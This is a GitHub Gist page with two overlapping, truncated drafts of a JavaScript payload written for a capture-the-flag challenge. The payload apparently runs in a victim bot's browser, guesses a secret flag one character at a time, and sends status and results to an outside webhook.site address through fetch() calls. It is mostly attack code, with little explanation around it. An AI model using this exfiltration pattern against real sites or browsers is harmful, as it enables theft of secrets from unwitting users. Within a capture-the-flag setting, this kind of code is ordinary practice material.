Skip to content

Instantly share code, notes, and snippets.

View Pytech04's full-sized avatar
🎯
Focusing

Piyush Sahu Pytech04

🎯
Focusing
View GitHub Profile
(async function() {
// 1. YOUR WEBHOOK
var webhook = "https://webhook.site/1840a34e-be0e-4392-a483-7869e4843c96";
var flag = "p_ctf{";
var charset = "abcdefghijklmnopqrstuvwxyz0123456789_}";
// 2. Send a start signal (Diagnostic)
fetch(webhook + "?status=STARTING_ATTACK");
(async function() {
const webhook = "https://webhook.site/1840a34e-be0e-4392-a483-7869e4843c96"; // <--- PUT YOUR WEBHOOK HERE
let flag = "p_ctf{";
const charset = "abcdefghijklmnopqrstuvwxyz0123456789_}";
// Send a "START" signal so you know the bot ran the script
fetch(webhook + "?status=started");
while (!flag.endsWith("}")) {
let found = false;